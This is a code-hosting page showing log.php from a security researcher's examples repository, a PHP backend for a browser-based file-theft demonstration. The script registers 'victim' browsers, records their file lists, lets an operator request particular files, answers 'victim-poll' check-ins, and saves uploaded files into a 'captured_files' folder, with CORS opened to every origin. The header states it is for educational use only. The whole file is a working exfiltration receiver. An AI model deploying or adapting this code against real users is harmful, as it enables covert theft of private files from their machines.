PageRenderTime 29ms CodeModel.GetById 30ms RepoModel.GetById 0ms app.codeStats 0ms

/webkit-upload/log.php

https://github.com/koto/blog-kotowicz-net-examples
PHP | 95 lines | 65 code | 11 blank | 19 comment | 14 complexity | d716df905b9d73b9c9e7c58330c75cb9 MD5 | raw file
    

  1. <?php
    2. 

  2. require_once 'Upload_Client.php';
    3. 

  3. /**
    4. 

  4.  * Store tracking log
    5. 

  5.  * @author Krzysztof Kotowicz <kkotowicz at gmail dot com>
    6. 

  6.  * @see http://blog.kotowicz.net
    7. 

  7.  *
    8. 

  8.  * THIS FILE IS PART OF THE PROJECT FOR EDUCATIONAL USE *ONLY*
    9. 

  9.  * ANY COMMERCIAL USE, E.G. FOR VULNERABILITY ASSESSMENT,
    10. 

  10.  * PENETRATION TESTING IS PROHIBITED - CONTACT THE AUTHOR FOR PERMISSION
    11. 

  11.  *
    12. 

  12.  * PERFORMING ACTUAL ATTACKS ON WEBSITES NOT OWNED BY YOU
    13. 

  13.  * USING THIS PROJECT IS PROHIBITED!
    14. 

  14.  */
    15. 

  15. 

  16. // i'm CORS capable
    17. 

  17. header("Access-Control-Allow-Origin: *");
    18. 

  18. header("Access-Control-Allow-Methods: POST, GET, OPTIONS");
    19. 

  19. header("Access-Control-Max-Age: 999999");
    20. 

  20. 

  21. if ($_SERVER['REQUEST_METHOD'] == 'OPTIONS') {
    22. 

  22.     // preflight, skip
    23. 

  23.     die();
    24. 

  24. }
    25. 

  25. // init
    26. 

  26. $db = new PDO('sqlite:' . dirname(__FILE__) . DIRECTORY_SEPARATOR . 'clients.sqlite');
    27. 

  27. $client = new Upload_Client($db);
    28. 

  28. 

  29. $file_storage = dirname(__FILE__) . DIRECTORY_SEPARATOR . 'captured_files';
    30. 

  30. $response = new stdClass;
    31. 

  31. 

  32. if (!empty($_POST)) {
    33. 

  33.     unset($_POST['_']);
    34. 

  34. 

  35.     if (empty($_POST['client'])) {
    36. 

  36.         // create client id and store in db
    37. 

  37. 	    $_POST['client'] = $client->create($_SERVER['HTTP_USER_AGENT'], $_SERVER['REMOTE_ADDR']);
    38. 

  38.     }
    39. 

  39. 

  40. 	$_POST['client'] = $id = (string) $_POST['client'];
    41. 

  41. 

  42. 	// get client data from db into json
    43. 

  43. 	$client->load($id);
    44. 

  44. 

  45.     switch ($_POST['msg']) { // process messages
    46. 

  46.         case 'get-clients':
    47. 

  47.             $response->clients = $client->getClients($_SERVER['REMOTE_ADDR']);
    48. 

  48.             break;
    49. 

  49.         case 'get-files':
    50. 

  50.             $response->files = $client->getFiles();
    51. 

  51.             $response->client_data = $client->getClient($id, $_SERVER['REMOTE_ADDR']);  
    52. 

  52.             break;
    53. 

  53.     	case 'set-files':
    54. 

  54.     		$response->client = $id;
    55. 

  55.     		$client->setFiles($_POST['files']);
    56. 

  56.     		break;
    57. 

  57.     	case 'request-file':
    58. 

  58.     		$client->requestFileForUpload($_POST['file']);
    59. 

  59.     		break;
    60. 

  60.     	case 'will-send-file':
    61. 

  61.     		$client->MarkFileAsInProgress($_POST['file']);
    62. 

  62.             break;
    63. 

  63.     	case 'upload-file':
    64. 

  64.             if (!empty($_FILES['contents']) && array_key_exists('fileid', $_POST) && $client->hasFile($_POST['fileid'])) {  // process file upload
    65. 

  65.                 $uniq = "file-" . md5(mt_rand() . uniqid());
    66. 

  66.                 $match = array();
    67. 

  67.                 if (preg_match('#\/(jpe?g|gif|png|pdf)$#i', $_POST['type'], $match)) { // images and pdf are "safe" to serve 
    68. 

  68.                 	$ext = $match[1];
    69. 

  69.             	} else if (preg_match('#\.([a-z0-9]{1,4})$#i', $_FILES['contents']['name'], $match)) { // cite extenstion for other files
    70. 

  70.             	    $ext = $match[1] . '.bin';
    71. 

  71.             	} else {
    72. 

  72.             		$ext = 'bin';
    73. 

  73.             	}
    74. 

  74.             	$filename = $uniq . '.' . $ext;
    75. 

  75.                 if (move_uploaded_file($_FILES['contents']['tmp_name'], $file_storage . DIRECTORY_SEPARATOR . $filename)) {
    76. 

  76.                     $client->markUploadedFile($_POST['fileid'], $filename);
    77. 

  77.                 } else {
    78. 

  78.                     $client->markErrorInFile($_POST['fileid']);
    79. 

  79.                 }
    80. 

  80.             }
    81. 

  81.     	    break;
    82. 

  82.     	case 'victim-poll':
    83. 

  83.             $response->requested = $client->getRequestedFiles();
    84. 

  84.             $client->ping();
    85. 

  85.     	    break;
    86. 

  86. 	}
    87. 

  87. 

  88. 	// persist client data
    89. 

  89.     $client->store();
    90. 

  90. }
    91. 

  91. 

  92. 

  93. // respond
    94. 

  94. header("Content-Type: application/json");
    95. 

  95. echo json_encode($response);
    96. 

  96.